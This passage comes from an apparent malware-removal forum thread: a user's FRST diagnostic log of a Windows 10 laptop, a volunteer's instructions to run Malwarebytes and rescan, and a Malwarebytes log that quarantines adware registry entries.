HP SimplePass Identity Protection (HKLM-x32\...\InstallShield_{E6CB67CC-71D2-46b9-8D43-A4641A9EECB2}) (Version: 6.5.5.20 - Egis Technology Inc.)
HP Software Framework (HKLM-x32\...\{835B275B-F29B-464B-BD4B-097FD55FAB0A}) (Version: 4.6.8.1 - Hewlett-Packard Company)
HP Support Solutions Framework (HKLM-x32\...\{23CCE784-A812-4647-AEFF-1DCCD4E57478}) (Version: 11.50.0000 - Hewlett-Packard Company)
HP Utility Center (HKLM-x32\...\{0C57987A-A03A-4B95-A309-D23F78F406CA}) (Version: 1.0.7 - Hewlett-Packard)
HP Wireless Button Driver (HKLM-x32\...\{30B2D1D8-0A07-4B71-9553-0710C5D31E35}) (Version: 1.1.2.1 - Hewlett-Packard Company)
IDT Audio (HKLM-x32\...\{E3A5A8AB-58F6-45FF-AFCB-C9AE18C05001}) (Version: 1.0.6425.0 - IDT)
Intel® Control Center (HKLM-x32\...\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.1.1008 - Intel Corporation)
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.1.0.1252 - Intel Corporation)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.4276 - Intel Corporation)
Intel® SDK for OpenCL - CPU Only Runtime Package (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version: 2.0.0.37149 - Intel Corporation)
Itibiti RTC (x32 Version: 0.0.1 - Itibiti Inc) Hidden
Java 8 Update 73 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218073F0}) (Version: 8.0.730.2 - Oracle Corporation)
Media Suite (x32 Version: 10 - CyberLink Corp.) Hidden
Microsoft Office Professional Plus 2010 (HKLM-x32\...\Office14.PROPLUS) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.41212.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Movie Maker (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Mozilla Firefox 44.0.2 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 44.0.2 (x86 en-US)) (Version: 44.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 44.0.2.5884 - Mozilla)
Norton Security (HKLM-x32\...\NS) (Version: 22.5.5.15 - Symantec Corporation)
PDF Settings CS6 (x32 Version: 11.0 - Adobe Systems Incorporated) Hidden
Picasa 3 (HKLM-x32\...\Picasa 3) (Version: 3.9.141.259 - Google, Inc.)
Ralink RT5390R 802.11bgn Wi-Fi Adapter (HKLM-x32\...\{8FC4F1DD-F7FD-4766-804D-3C8FF1D309AF}) (Version: 5.0.2.0 - Ralink)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.2.612.2012 - Realtek)
Realtek PCIE Card Reader (HKLM-x32\...\{C1594429-8296-4652-BF54-9DBE4932A44C}) (Version: 6.2.8400.29034 - Realtek Semiconductor Corp.)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version:  - Microsoft)
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 19.0.12.95 - Synaptics Incorporated)
Validity WBF DDK (HKLM\...\{1F91C200-8F0F-4009-A75E-DB6CE151BD4E}) (Version: 4.4.234.0 - Validity Sensors, Inc.)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)
Wondershare Video Converter Free(Build 6.5.1.0) (HKLM-x32\...\Wondershare Video Converter Free_is1) (Version: 6.5.1.0 - Wondershare Software)
Yahoo Browser Settings (HKLM-x32\...\Yahoo Browser Settings) (Version:  - Yahoo! Inc.)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-1018505005-2824899964-3694806622-1001_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\levilaing\AppData\Local\Microsoft\OneDrive\17.3.6302.0225\FileCoAuth.exe (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1018505005-2824899964-3694806622-1001_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\WINDOWS\system32\igfxEM.exe (Intel Corporation)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {099EA545-0C53-45B7-AB54-CA2018855CAF} - System32\Tasks\CLMLSvc_P2G8 => C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe [2012-06-07] (CyberLink)
Task: {164BC185-5AC3-49DD-9D98-0BA405318464} - System32\Tasks\MirageAgent => C:\Program Files (x86)\CyberLink\YouCam\YCMMirage.exe [2012-07-27] (CyberLink)
Task: {1BEA3822-8B93-4F5B-B436-4811FCB531F5} - System32\Tasks\Hewlett-Packard\HP CoolSense\HP CoolSense Start at Logon => C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe [2012-11-05] (Hewlett-Packard Development Company, L.P.)
Task: {1C58E21A-1171-40B6-B0B7-1546A27AA771} - System32\Tasks\CLVDLauncher => C:\Program Files (x86)\CyberLink\Power2Go8\CLVDLauncher.exe [2012-07-24] (CyberLink Corp.)
Task: {2BDE1E7E-8AA4-4DDB-82C2-DB181FDEED54} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-02-09] (Adobe Systems Incorporated)
Task: {4422E649-0CA1-4D11-9D8E-4F3D0246786D} - System32\Tasks\Norton Security\Norton Autofix => C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\SymErr.exe [2015-11-05] (Symantec Corporation)
Task: {69B68B87-4EE3-45A7-A72C-A1EFFF4CEBC1} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-01] (Google Inc.)
Task: {78A8E711-9886-4157-AE31-7E585AAB241A} - System32\Tasks\[email protected] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2012-09-20] (Adobe Systems Incorporated)
Task: {82B26FB7-DABB-47F1-8079-1229C6C723B6} - System32\Tasks\Norton Security\Norton Error Processor => C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\SymErr.exe [2015-11-05] (Symantec Corporation)
Task: {A5169291-4386-4125-8918-37E485684151} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2016-02-09] (Microsoft Corporation)
Task: {A6D352C7-BEDD-458F-81CB-152C8FEBAC74} - System32\Tasks\Synaptics TouchPad Enhancements => Program Files\Synaptics\SynTP\SynTPEnh.exe
Task: {AC20895B-0994-4365-8AE9-4EA91DCA9545} - System32\Tasks\Norton WSC Integration => C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\WSCStub.exe [2015-11-20] (Symantec Corporation)
Task: {B2AF2465-3FB6-4AB9-8916-8064970A2792} - System32\Tasks\Norton Security\Norton Error Analyzer => C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\SymErr.exe [2015-11-05] (Symantec Corporation)
Task: {D0FDAB6C-C95E-48AB-AA04-97C7CBD08F91} - System32\Tasks\Atofcuuu => C:\PROGRA~1\PHRASE~1\Aluts.bat
Task: {E4FAE6DB-741C-4D03-88F4-5CF3AD1ED864} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Warranty Opt-In(No) => c:\program files (x86)\hewlett-packard\hp health check\activecheck\product_line\Detection_PostWarrantyAlert.exe
Task: {F46D7244-6DB6-42B8-9D4C-734C1F747184} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-01] (Google Inc.)
Task: {FBE6FA96-A961-4CE0-A0B4-89A6B663D7BA} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Warranty Opt-In(Yes) => c:\program files (x86)\hewlett-packard\hp health check\activecheck\product_line\Detection_PostWarrantyAlert.exe

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\Synaptics TouchPad Enhancements.job => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

==================== Loaded Modules (Whitelisted) ==============

2015-10-30 01:18 - 2015-10-30 01:18 - 00185856 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2015-09-28 19:29 - 2012-03-27 21:49 - 00140456 _____ () C:\Program Files (x86)\Canon\IJPLM\IJPLMSVC.EXE
2012-09-06 03:47 - 2012-09-06 03:47 - 00028160 _____ () C:\Windows\system32\valWBFPolicyService.exe
2016-03-01 12:58 - 2016-02-23 05:27 - 02654872 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2016-03-01 12:58 - 2016-02-23 05:27 - 02654872 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2013-09-05 00:17 - 2013-09-05 00:17 - 04300456 _____ () C:\Program Files\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF
2010-10-20 15:23 - 2010-10-20 15:23 - 08801632 _____ () C:\Program Files\Microsoft Office\Office14\1033\GrooveIntlResource.dll
2016-01-21 12:55 - 2016-01-21 12:55 - 00144384 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeHost.exe
2015-12-19 20:59 - 2015-12-19 20:59 - 00093696 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\Windows.UI.Shell.SharedUtilities.dll
2016-03-01 12:57 - 2016-02-23 02:36 - 00472064 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2016-01-12 12:12 - 2016-01-04 19:29 - 07992832 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2016-01-12 12:12 - 2016-01-04 19:23 - 00591360 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-01-27 17:28 - 2016-01-15 23:10 - 02483200 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2016-01-27 17:28 - 2016-01-15 23:13 - 04089856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2016-01-21 12:55 - 2016-01-21 12:55 - 00141312 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeBackgroundTasks.dll
2016-01-21 12:55 - 2016-01-21 12:55 - 22330368 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkyWrap.dll
2012-12-20 18:30 - 2012-06-25 12:41 - 01198912 _____ () C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\ACE.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)


==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)


==================== EXE Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2013-08-22 07:25 - 2016-03-08 16:56 - 00000056 ____A C:\WINDOWS\system32\Drivers\etc\hosts

127.0.0.1       localhost
::1             localhost

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\levilaing\AppData\Local\Microsoft\Windows\Themes\RoamedThemeFiles\DesktopBackground\{9deef5e1-ccab-4b3d-bca1-455b50a6a967}.jpg
DNS Servers: 68.105.28.11 - 68.105.29.11
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)

HKLM\...\StartupApproved\Run32: => "Price Finder"
HKLM\...\StartupApproved\Run32: => "ShopAtHomeUpdater"
HKLM\...\StartupApproved\Run32: => "ShopAtHomeWatcher"
HKLM\...\StartupApproved\Run32: => "AdobeCS6ServiceManager"
HKLM\...\StartupApproved\Run32: => "BCSSync"
HKLM\...\StartupApproved\Run32: => "CanonQuickMenu"
HKLM\...\StartupApproved\Run32: => "Wondershare Helper Compact.exe"
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\StartupApproved\Run: => "BitTorrent"
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\StartupApproved\Run: => "Power2GoExpress8"
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\StartupApproved\Run: => "SearchProtection"

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== Restore Points =========================

09-02-2016 13:53:15 Windows Update
01-03-2016 13:01:54 Windows Update
01-03-2016 13:02:55 Windows Update
08-03-2016 16:48:57 Removed Bonjour
09-03-2016 17:44:29 JRT Pre-Junkware Removal

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (03/09/2016 05:44:46 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Cryptographic Services failed while processing the OnIdentity() call in the System Writer Object.

Details:
AddLegacyDriverFiles: Unable to back up image of binary Microsoft Link-Layer Discovery Protocol.

System Error:
Access is denied.
.

Error: (03/09/2016 05:14:27 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program ns.exe version 13.0.2.6 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel.

Process ID: e1c

Start Time: 01d17a55c29d78ee

Termination Time: 14

Application Path: C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\ns.exe

Report Id: a616f939-e64c-11e5-bec4-a0b3cc48869f

Faulting package full name:

Faulting package-relative application ID:

Error: (03/08/2016 04:49:01 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Cryptographic Services failed while processing the OnIdentity() call in the System Writer Object.

Details:
AddLegacyDriverFiles: Unable to back up image of binary Microsoft Link-Layer Discovery Protocol.

System Error:
Access is denied.
.

Error: (03/07/2016 01:17:25 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 15625

Error: (03/07/2016 01:17:25 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 15625

Error: (03/07/2016 01:17:25 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second

Error: (03/07/2016 01:17:19 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 9140

Error: (03/07/2016 01:17:19 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 9140

Error: (03/07/2016 01:17:19 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second

Error: (03/04/2016 03:50:53 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 1109


System errors:
=============
Error: (03/09/2016 05:40:31 PM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: {784E29F4-5EBE-4279-9948-1E8FE941646D}

Error: (03/09/2016 05:36:04 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The EraserSvc11511 service failed to start due to the following error:
%%2

Error: (03/09/2016 05:35:58 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The EgisTec Service service failed to start due to the following error:
%%1053

Error: (03/09/2016 05:35:58 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the EgisTec Service service to connect.

Error: (03/09/2016 05:35:36 PM) (Source: Microsoft-Windows-Directory-Services-SAM) (EventID: 16953) (User: NT AUTHORITY)
Description: The password notification DLL EgisDSPwdFilter failed to load with error 126. Please verify that the notification DLL path defined in the registry, HKLM\System\CurrentControlSet\Control\Lsa\Notification Packages, refers to a correct and absolute path (<drive>:\<path>\<filename>.<ext>) and not a relative or invalid path. If the DLL path is correct, please validate that any supporting files are located in the same directory, and that the system account has read access to both the DLL path and any supporting files.  Contact the provider of the notification DLL for additional support. Further details can be found on the web at http://go.microsoft..../?LinkId=245898.

Error: (03/09/2016 05:35:36 PM) (Source: Microsoft-Windows-Directory-Services-SAM) (EventID: 16953) (User: NT AUTHORITY)
Description: The password notification DLL EgisPwdFilter failed to load with error 126. Please verify that the notification DLL path defined in the registry, HKLM\System\CurrentControlSet\Control\Lsa\Notification Packages, refers to a correct and absolute path (<drive>:\<path>\<filename>.<ext>) and not a relative or invalid path. If the DLL path is correct, please validate that any supporting files are located in the same directory, and that the system account has read access to both the DLL path and any supporting files.  Contact the provider of the notification DLL for additional support. Further details can be found on the web at http://go.microsoft..../?LinkId=245898.

Error: (03/09/2016 05:34:32 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The User Data Access_52e0f service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.

Error: (03/09/2016 05:34:32 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The User Data Storage_52e0f service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.

Error: (03/09/2016 05:34:32 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Contact Data_52e0f service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.

Error: (03/09/2016 05:34:32 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Sync Host_52e0f service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.


CodeIntegrity:
===================================
  Date: 2016-03-01 13:39:04.692
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-02-15 11:48:03.432
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-02-09 21:20:12.135
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-01-28 15:09:07.207
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-01-19 20:04:09.326
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-01-12 14:52:54.813
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-01-06 07:51:33.186
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2015-12-31 10:57:24.742
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2015-12-28 11:47:23.759
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2015-12-24 11:09:17.839
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.


==================== Memory info ===========================

Processor: Intel® Core™ i5-3210M CPU @ 2.50GHz
Percentage of memory in use: 31%
Total physical RAM: 6033.27 MB
Available physical RAM: 4133.63 MB
Total Virtual: 6993.27 MB
Available Virtual: 5181.11 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:669.53 GB) (Free:596.76 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive d: (RECOVERY) (Fixed) (Total:27.14 GB) (Free:3.16 GB) NTFS ==>[system with boot components (obtained from drive)]

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 698.6 GB) (Disk ID: 5CA0CBD1)

Partition: GPT.

==================== End of Addition.txt ============================



#10
pystryker

    Trusted Helper

  • Malware Removal
  • 3,886 posts
Hello :)

I see you had success in downloading JRT and getting it to run. :thumbsup:

I do see a file that refused to be shown the door in the initial fix, so we'll hit it with a bigger hammer.


Please disable your antivirus for the duration of my instructions. Don't forget to re-enable them after you have completed the steps.

Step 1: Scan with Malwarebytes


Please download Malwarebytes Anti-Malware to your desktop.
  • Install the program and select Update.
  • Once it has updated, select Settings > Detection and Protection.
  • Tick Scan for rootkits.
  • Go back to the Dashboard and select Scan Now.
  • If threats are detected, click the Apply Actions button. MBAM will ask for a reboot.
  • On completion of the scan (or after the reboot), start MBAM.
  • Click History, then Application Logs, then check the Select box by the first Scan Log in the list and then click on the log to highlight it.
  • Click Export, select text file and save to the desktop as MBAM.txt and post in your next reply.

Note: It is essential you reboot the machine before running the next step.


Step 2: Fresh FRST Scan
  • Start Farbar's Recovery Scan Tool and press the Scan button.
  • FRST will scan your system and produce two logs: FRST.txt and Addition.txt. Please post them in your next reply.
Things I need to see in your next post:

Please post each of these logs as a separate reply in this thread.
  • MBAM Log
  • Fresh FRST.txt Log
  • Fresh Addition.txt Log


#11
LLL31

    Member

  • Topic Starter
  • Member
  • PipPip
  • 15 posts

I didn't see where a new addition log was created. Just the old one.

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 3/9/2016
Scan Time: 6:33 PM
Logfile: MBAM.txt
Administrator: Yes

Version: 2.2.0.1024
Malware Database: v2016.03.09.06
Rootkit Database: v2016.02.27.01
License: Trial
Malware Protection: Enabled
Malicious Website Protection: Enabled
Self-protection: Disabled

OS: Windows 10
CPU: x64
File System: NTFS
User: levilaing

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 375956
Time Elapsed: 43 min, 31 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 33
PUP.Optional.MySearchDial, HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{77AA745B-F4F8-45DA-9B14-61D2D95054C8}, Quarantined, [7e3c622386136fc72bb3427736cc5da3],
PUP.Optional.MySearchDial, HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{77AA745B-F4F8-45DA-9B14-61D2D95054C8}, Quarantined, [7e3c622386136fc72bb3427736cc5da3],
PUP.Optional.MindSpark, HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{65C72339-FB1D-4155-84E1-9AFACEE02D6F}, Quarantined, [79413b4a3d5c55e1a3d88335f70b7e82],
PUP.Optional.FunWebProducts, HKLM\SOFTWARE\CLASSES\CouponXplorer_5z.SkinLauncherSettings, Quarantined, [8a30e79eb2e7c0765d453383a161b14f],
PUP.Optional.FunWebProducts, HKLM\SOFTWARE\CLASSES\CouponXplorer_5z.SkinLauncherSettings.1, Quarantined, [e2d8661f2475dc5a940e7046ba4838c8],
PUP.Optional.FunWebProducts, HKLM\SOFTWARE\WOW6432NODE\CLASSES\CouponXplorer_5z.SkinLauncherSettings, Quarantined, [e2d8661f2475dc5a940e7046ba4838c8],
PUP.Optional.FunWebProducts, HKLM\SOFTWARE\WOW6432NODE\CLASSES\CouponXplorer_5z.SkinLauncherSettings.1, Quarantined, [e2d8661f2475dc5a940e7046ba4838c8],
PUP.Optional.FunWebProducts, HKLM\SOFTWARE\CLASSES\WOW6432NODE\CouponXplorer_5z.SkinLauncherSettings, Quarantined, [e2d8661f2475dc5a940e7046ba4838c8],
PUP.Optional.FunWebProducts, HKLM\SOFTWARE\CLASSES\WOW6432NODE\CouponXplorer_5z.SkinLauncherSettings.1, Quarantined, [e2d8661f2475dc5a940e7046ba4838c8],
PUP.Optional.Komodia, HKLM\SOFTWARE\CLASSES\QacsauolLib.CiimLheamojbad, Quarantined, [befcb7ce742570c6911853ba897a42be],
PUP.Optional.Komodia, HKLM\SOFTWARE\CLASSES\QacsauolLib.CiimLheamojbad.1, Quarantined, [a6148df8f9a0181e6247030a36cd7789],
PUP.Optional.Komodia, HKLM\SOFTWARE\CLASSES\QacsauolLib.DodpGuokdos, Quarantined, [8d2de4a1ebaed3633d6ccd40b35030d0],
PUP.Optional.Komodia, HKLM\SOFTWARE\CLASSES\QacsauolLib.DodpGuokdos.1, Quarantined, [efcb364f3a5fd2644f5a37d6fd06a65a],
PUP.Optional.Komodia, HKLM\SOFTWARE\CLASSES\QacsauolLib.JacCodwugeif, Quarantined, [6555374ea6f3fc3a21885db058abdb25],
PUP.Optional.Komodia, HKLM\SOFTWARE\CLASSES\QacsauolLib.JacCodwugeif.1, Quarantined, [16a4f98c5d3c75c19910cf3e4fb4f10f],
